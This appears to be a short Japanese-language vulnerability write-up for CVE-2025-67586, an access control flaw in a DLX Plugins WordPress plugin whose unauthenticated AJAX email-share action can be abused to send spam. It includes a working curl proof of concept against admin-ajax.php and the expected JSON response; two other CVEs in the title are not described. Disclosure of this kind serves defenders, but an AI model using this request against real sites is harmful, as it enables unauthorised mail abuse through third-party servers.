
解説記事 (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)
(CVE-2025-67586, CVE-2025-67985, CVE-2025-67986) の解説
-------------- CVE-2025-67586 Exploit PoC --------------
==> 説明 DLX Pluginsが開発したWordPressプラグインに、アクセス制御の不備の脆弱性が存在します。 このプラグインは、適切な権限チェックなしに「メールで共有」機能を悪用することを可能にする、認証されていないAJAXアクションを公開しています。
認証されていない攻撃者は、有効な投稿ノンスを再利用してメール共有リクエストをトリガーし、ユーザー認証なしに不正なメール送信(スパムメール/悪用)を行うことができます。
==> 必要な権限 なし(認証不要)
==> 概念実証 (PoC)
ステップ1: インストール済みのプラグインがあるウェブサイトを選択
ステップ2: 有効なノンスを取得
ステップ3: 認証されていないリクエストによるエクスプロイト
bashコマンド: (ウェブサイトURL、投稿URL、ノンスを置き換えてください)
curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]='
-d 'formData[toEmail]=[email protected]'
-d 'formData[subject]=PoC'
-d 'formData[shareText]=POC test'
-d 'formData[emailShareType]=selection'
--compressed
--> 期待されるJSONレスポンス:
{ "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with [email protected]", "message_subject": "[Shared Post] ", "message_source_name": "Site Name", "message_source_email": "[email protected]" } }